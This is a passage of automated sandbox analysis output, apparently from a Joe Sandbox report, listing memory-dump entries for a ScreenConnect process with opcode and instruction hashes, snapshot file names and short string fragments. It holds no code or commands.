                                                                                                                                                                                • String ID: $]q$$]q
                                                                                                                                                                                • API String ID: 0-127220927
                                                                                                                                                                                • Opcode ID: 2a735f7ec282148986c2879da4696224266ea7df4eb2361dfedc3873cad4abb2
                                                                                                                                                                                • Instruction ID: 25bee5516c2fc2c71f2e17cf13c03c1ff66db8b21ee4e4f0b4feb6031d6f0714
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a735f7ec282148986c2879da4696224266ea7df4eb2361dfedc3873cad4abb2
                                                                                                                                                                                • Instruction Fuzzy Hash: 6001A23474A3848FC31AAB7998188693FF5FF4671135948EAD8468B273DB35DC06CB41
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                • Opcode ID: 8e608322174e47122d105f69cd2a3f020d34b5a6c777bdf33e9d1626188c687c
                                                                                                                                                                                • Instruction ID: c22a9bdf76128e7bc5d9222fa01f0ae77d36c2fccb895b4039395c9d3a20821e
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e608322174e47122d105f69cd2a3f020d34b5a6c777bdf33e9d1626188c687c
                                                                                                                                                                                • Instruction Fuzzy Hash: 71610734B106198FCB14DFA9D894AAEB7F6FF8D315B1081A5E9069B365DB30EC12DB40
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                • Opcode ID: 7f9c5efd4e720c6ffc684df221340c38d6d0e7568a8e0fb6711ed0b221f07354
                                                                                                                                                                                • Instruction ID: 57d2a2b5f873b1a41bd3176f73f4184bd4f50371a709509ede87218d2ea71621
                                                                                                                                                                                • Opcode Fuzzy Hash: 7f9c5efd4e720c6ffc684df221340c38d6d0e7568a8e0fb6711ed0b221f07354
                                                                                                                                                                                • Instruction Fuzzy Hash: D4513530B142109FDB259B64D858B6EBBF2FF84704F1485AAE446DB3A1EF349C46CB91
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                • Opcode ID: 7aca222bc5ce1351ce8b91e7d45e3edacf4ebdb6d72e1835d91885fdb9191137
                                                                                                                                                                                • Instruction ID: 1a39535ba8d1f4c4716c3a0ecea1b0fe435546db688dc9d6175a817fd845f872
                                                                                                                                                                                • Opcode Fuzzy Hash: 7aca222bc5ce1351ce8b91e7d45e3edacf4ebdb6d72e1835d91885fdb9191137
                                                                                                                                                                                • Instruction Fuzzy Hash: B341A331A00505CBDB15EF68E594AAEBFB6EF84310B14C569D9059B366DF38EC0BCB90
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ['
                                                                                                                                                                                • API String ID: 0-410297704
                                                                                                                                                                                • Opcode ID: e9f3559b31bd889796e057c3eb9e2d7a2a90e8c41600456d4e54319ff740caa4
                                                                                                                                                                                • Instruction ID: e1c08f0108556e0a747b901417ce65bd4f24b7220b35b17b4fc11578a72fb1ea
                                                                                                                                                                                • Opcode Fuzzy Hash: e9f3559b31bd889796e057c3eb9e2d7a2a90e8c41600456d4e54319ff740caa4
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F3148317012015BCB15AB7CA95095E7BEAEFC47903048179D80ADB364EF34EE0A8BD1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4
                                                                                                                                                                                • API String ID: 0-4088798008
                                                                                                                                                                                • Opcode ID: e67af1916e1cce41738e17f149542617fe302f01c80c560fe07dc5d835b0b9af
                                                                                                                                                                                • Instruction ID: cf68ec160aa1db9ea7b3777267fd397eba0f57c0531d2ff46fd7d8097fe28581
                                                                                                                                                                                • Opcode Fuzzy Hash: e67af1916e1cce41738e17f149542617fe302f01c80c560fe07dc5d835b0b9af
                                                                                                                                                                                • Instruction Fuzzy Hash: FFF020313043409FDB015BA8649C2AA7BEAEF88211758C0B9E50AC7241CE385C0BC325
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6b1e880048fdd375ab278554a34bd998682ab2c09b949ffe89d4ca83060b0a6f
                                                                                                                                                                                • Instruction ID: eeba1d4ef0eb7dcde73d73bc6f6bb22301adcc9e8588e742b2bd747938d5821b
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b1e880048fdd375ab278554a34bd998682ab2c09b949ffe89d4ca83060b0a6f
                                                                                                                                                                                • Instruction Fuzzy Hash: 6A51F270D453059FDB05DFB4D854BDDBBB5FF89310F10859AD004AB2A6EB38A94ACB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 12b123c80f1f6c9489074ea8e92af84ff6021ad72224c9caa93bfae5b07e9572
                                                                                                                                                                                • Instruction ID: 0388b7c6985927a764230db37c9fa2829554b35b9284da2364ab9a80b0530f0c
                                                                                                                                                                                • Opcode Fuzzy Hash: 12b123c80f1f6c9489074ea8e92af84ff6021ad72224c9caa93bfae5b07e9572
                                                                                                                                                                                • Instruction Fuzzy Hash: 8E516F30E403059FDB05EFB4D854BDDBBF5EF89300F108559E404AB2A5DB74A95ACB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ecad87e56c3265e24bd0f00a40ea0e95ffb584273b66048c32d820e76f4056d8
                                                                                                                                                                                • Instruction ID: 08541a59afe0af791769c5bf82599a78baf3773190f636720a9161a03294c176
                                                                                                                                                                                • Opcode Fuzzy Hash: ecad87e56c3265e24bd0f00a40ea0e95ffb584273b66048c32d820e76f4056d8
                                                                                                                                                                                • Instruction Fuzzy Hash: C951B0746007458FCB34DF39D844A6ABBF1EF457207144AADD096C76A1DB34EE4ACB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 82cbf1dc998fcd7e1e80fde1f08dc8f89936b8521d9c4feee460da7a0eae0efe
                                                                                                                                                                                • Instruction ID: b2756e7f87bcb34b5e12d0cbbc2b5673425a7a817dec690cd43aaf26c28c0dcd
                                                                                                                                                                                • Opcode Fuzzy Hash: 82cbf1dc998fcd7e1e80fde1f08dc8f89936b8521d9c4feee460da7a0eae0efe
                                                                                                                                                                                • Instruction Fuzzy Hash: 21513A34600A05CFC724DF69D884A27B7F2FF8D324B244AADD4968B7A4DB31E806CB44
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 720275135ad2ab6898f15d7e1c82d182faf230883330199d38e71a67e498421c
                                                                                                                                                                                • Instruction ID: 449f343dc473984787c62febe461fceac2426af842666f117e9cc4fb4a7eb536
                                                                                                                                                                                • Opcode Fuzzy Hash: 720275135ad2ab6898f15d7e1c82d182faf230883330199d38e71a67e498421c
                                                                                                                                                                                • Instruction Fuzzy Hash: 86518130E403059FDB05EFB4D844BDDBBF5EF89300F608569E504AB2A5DB74A94ACB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0b4fd94f25b6f5729b351bcfcdd1e1d88c93be308bcff2d4b54eddcccbaecae5
                                                                                                                                                                                • Instruction ID: 9f17e16f3df352c255df3bd29786355f02a04669bc01c2e20b548d343ab76027
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4fd94f25b6f5729b351bcfcdd1e1d88c93be308bcff2d4b54eddcccbaecae5
                                                                                                                                                                                • Instruction Fuzzy Hash: E5416CB4600705CFCB24DF29D984A6ABBF5FF48B10B108A68D456D77A1EB34ED46CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8cdcbf08ed103a0ba1ed7b7c7bd8b1a1f326a4d9cb9f5898e14a7f88d30e1cd0
                                                                                                                                                                                • Instruction ID: 36ea49884204f4eff407706cc3d7e29b6f74a5821606fc6eae4ba315d2ba4492
                                                                                                                                                                                • Opcode Fuzzy Hash: 8cdcbf08ed103a0ba1ed7b7c7bd8b1a1f326a4d9cb9f5898e14a7f88d30e1cd0
                                                                                                                                                                                • Instruction Fuzzy Hash: 78319E31B102068BDB14DF69C494AAFFBF5EF89714F1484AAD406E73A4DB36DD018BA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1c1180daff9cc6709248fe743ce5c9cb8c506f4b2c8ea4cd403a3a6027e88281
                                                                                                                                                                                • Instruction ID: bea6c439b4fb1afafacb5502cc95c28a54c03f5874fc6f1b4dd695c4f3f8c02c
                                                                                                                                                                                • Opcode Fuzzy Hash: 1c1180daff9cc6709248fe743ce5c9cb8c506f4b2c8ea4cd403a3a6027e88281
                                                                                                                                                                                • Instruction Fuzzy Hash: B231BF70B042458FC705DB68C8546AEFFF6EFD9700B1480EAD949DB395DA359E02C791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 482f568abee887d063222b254748f27e3afe4cf4adc4eb47356e949b1eae9f00
                                                                                                                                                                                • Instruction ID: 829d6bd6c22bcbc666c6ccea03b02f2227e367882dddbb8e387a8834f4f715fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 482f568abee887d063222b254748f27e3afe4cf4adc4eb47356e949b1eae9f00
                                                                                                                                                                                • Instruction Fuzzy Hash: F021F630B081858FC705DB68C8505AEFFF1EF8A710B1840E6D849DB3A2DB359E06C791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bf0b91ea24deb2b4a85331d885c281788dd065619e2e646f83942de091f615c7
                                                                                                                                                                                • Instruction ID: c0b85e16e952f60f73e058e1d52f1fa48c4ddfa4992df272e8c851307ac28812
                                                                                                                                                                                • Opcode Fuzzy Hash: bf0b91ea24deb2b4a85331d885c281788dd065619e2e646f83942de091f615c7
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B315C30600B058FC730DF29D888A6BB7F2EF99320B144A6DD496CB7A5D730E806CB91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ce7f63c8de0c99514a3c4cb68b1994931d13a5cdebda09c5434b8c18789dcb2b
                                                                                                                                                                                • Instruction ID: 4fa07ad9396c002e47e74430f5222c8a8daada4db89747b77c97a2a5781cbb24
                                                                                                                                                                                • Opcode Fuzzy Hash: ce7f63c8de0c99514a3c4cb68b1994931d13a5cdebda09c5434b8c18789dcb2b
                                                                                                                                                                                • Instruction Fuzzy Hash: 7D318231A0011ADFCF05DFA8D9509CDBBF2FF89314F148066D509BB261DB31A906CB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 03a56b3f767548489acbf368ea5db64c56cb6e6e672c7e9a963daeeef33d8c7e
                                                                                                                                                                                • Instruction ID: 8acbe23a9788f7e14a2497f6e609bf7e8ab4217b69ef3cd8f442770b5e3d6d45
                                                                                                                                                                                • Opcode Fuzzy Hash: 03a56b3f767548489acbf368ea5db64c56cb6e6e672c7e9a963daeeef33d8c7e
                                                                                                                                                                                • Instruction Fuzzy Hash: C41121357002006BD704EB28E951B6E7FEAEFC0300F048466E909AB395EF30AD06CBE1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ce9e4ca19e6383789c8083fd7e39f4ce8d295f237efd3a557054d018ee5b6bb6
                                                                                                                                                                                • Instruction ID: 5cd850e3a8657c444d3699649b16912356797a1107c226b5ff69805dee503a70
                                                                                                                                                                                • Opcode Fuzzy Hash: ce9e4ca19e6383789c8083fd7e39f4ce8d295f237efd3a557054d018ee5b6bb6
                                                                                                                                                                                • Instruction Fuzzy Hash: 90213E31200A058FD734DF29D848A96BBF5EF44320B148B6DD592976A1DB31E94ACF80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2b3ce6645280edbe6b83f8ae00ccbf37153237160b2859fbbec04bd66d8ab884
                                                                                                                                                                                • Instruction ID: 8224e6a73200b68578aa650e64eef22e2b5ab977d55298818927b7e94eac2470
                                                                                                                                                                                • Opcode Fuzzy Hash: 2b3ce6645280edbe6b83f8ae00ccbf37153237160b2859fbbec04bd66d8ab884
                                                                                                                                                                                • Instruction Fuzzy Hash: 3D11E2357002045BD704EB6CE941B6EBBEAEFC4750F048929E905AB394EF30BE0587D1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a872e2f82b3668aa90b0bf05b5b69cef7a6ad860dc39d0e35326b13e701b685e
                                                                                                                                                                                • Instruction ID: 6b8e779eff860610c384d066534fc03c4aaf7d8db874dff4d7bb6abcb572766a
                                                                                                                                                                                • Opcode Fuzzy Hash: a872e2f82b3668aa90b0bf05b5b69cef7a6ad860dc39d0e35326b13e701b685e
                                                                                                                                                                                • Instruction Fuzzy Hash: D5112975B093905FCB068B289C24457BFF9EF8521471486EBD845DF262DA75DD0AC780
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9ff59ac5c80fc612efe010c0fd078fd040a19d829fccff6e30e54f96495a5890
                                                                                                                                                                                • Instruction ID: ab1fd10747f783c68ae143f0f9a8b0ea39522d685cd54ea2a82908887241bb85
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ff59ac5c80fc612efe010c0fd078fd040a19d829fccff6e30e54f96495a5890
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D11543590024A9FCF41DFA8C9409DEBFF1EF4A314B148596D949BF261D731AA0ACB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a25870b86cc50a4256bdfabd30903e50860d08cee20eb983be1ae2c5361c9c6e
                                                                                                                                                                                • Instruction ID: 00589f91192c22bc573c299de9740cf5012a9a42fb27e5bf9d019b8c9de1da26
                                                                                                                                                                                • Opcode Fuzzy Hash: a25870b86cc50a4256bdfabd30903e50860d08cee20eb983be1ae2c5361c9c6e
                                                                                                                                                                                • Instruction Fuzzy Hash: 7911E330B041418FCB05CB68D59556EFFF1EFC9710B2481AED80A9B392DB359D05C791
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7bf544e6f6783cac4179d770d9e328010ec6403ae08f849e99e0fbde2c330357
                                                                                                                                                                                • Instruction ID: 525224caab9848f6b07a64bbae67a8ef262b607691c88c918ab8cbb758cf10ac
                                                                                                                                                                                • Opcode Fuzzy Hash: 7bf544e6f6783cac4179d770d9e328010ec6403ae08f849e99e0fbde2c330357
                                                                                                                                                                                • Instruction Fuzzy Hash: 40110270E00344AFCB21CF68C8409EABBF2EFC1310F4884AAD594DB1A4D7728A12CB80
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4e4ed3117ab98ba5f3a55ddb68c46ab66625b2e74c5948ee5326230a543f2388
                                                                                                                                                                                • Instruction ID: 47128bbd89910f65d085ba5b346237ecded8f8336c1fbb19bdecc668d0e1fcde
                                                                                                                                                                                • Opcode Fuzzy Hash: 4e4ed3117ab98ba5f3a55ddb68c46ab66625b2e74c5948ee5326230a543f2388
                                                                                                                                                                                • Instruction Fuzzy Hash: 52118E70F00605AFDB24CA69C940AABB7F6EFC4310F5484A6D554D7294D7719E11DB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: af6949b1497da7ee39054120349aebd95001c4ac1ab1e49f7b8ff7ad1da6663b
                                                                                                                                                                                • Instruction ID: df5e4c9cfc5294a9787a9375e96ec7ebefe4599bd59c3cc7a9fcf1f02c597124
                                                                                                                                                                                • Opcode Fuzzy Hash: af6949b1497da7ee39054120349aebd95001c4ac1ab1e49f7b8ff7ad1da6663b
                                                                                                                                                                                • Instruction Fuzzy Hash: AE11583194000ADBCB15DFA8D5848DCBFF2FF81314F58C495E005AB129DB35E956CBA0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 76366faccbabc078291d688fa8bffa65b0c65c00c9458ba35bf7948b70e77c34
                                                                                                                                                                                • Instruction ID: c882ba63c239faedd432e8b889b9938c65b5c7d2b3e083a190e3ee639f67115c
                                                                                                                                                                                • Opcode Fuzzy Hash: 76366faccbabc078291d688fa8bffa65b0c65c00c9458ba35bf7948b70e77c34
                                                                                                                                                                                • Instruction Fuzzy Hash: 5E01F532A012049FC705DB6CE81099E7BE4EF8575075888EED41EC7301EB35AD068B91
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3c8d27af21d35b9f8fcbf50275649d8b0a3e220bbe3152c4e97a237a84b5f5af
                                                                                                                                                                                • Instruction ID: dfeb93dca5b77f257c95a21c7e99b56037b410b10282ffb4b0069420ca17e4ea
                                                                                                                                                                                • Opcode Fuzzy Hash: 3c8d27af21d35b9f8fcbf50275649d8b0a3e220bbe3152c4e97a237a84b5f5af
                                                                                                                                                                                • Instruction Fuzzy Hash: FC11163590010A9FCF40DFA8D9409DEBBF5FF49354B108556D509BB261D771AE06CBD0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2461982849.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b0d000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4dc47d517176ab0b4a1946b1434595a3819462d5be5a2064152d287d5f79f073
                                                                                                                                                                                • Instruction ID: 65648339b2e031a4bc7b86bd07f564af6ea51d59149938c60c9cedd65640cafd
                                                                                                                                                                                • Opcode Fuzzy Hash: 4dc47d517176ab0b4a1946b1434595a3819462d5be5a2064152d287d5f79f073
                                                                                                                                                                                • Instruction Fuzzy Hash: 56018C7240D3C09FD7124B258C94652BFB8EF53224F0984DBE8888F2E3D2695C45CB72
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2461982849.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b0d000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: db92f38ab6952a00c3e5c45d7747cd3eabfdd3b1a97ec452ae7e1549a44676d9
                                                                                                                                                                                • Instruction ID: 920131f53d0d145734389999705463e98a4068ccdf9155d34d0c5e86769ce94e
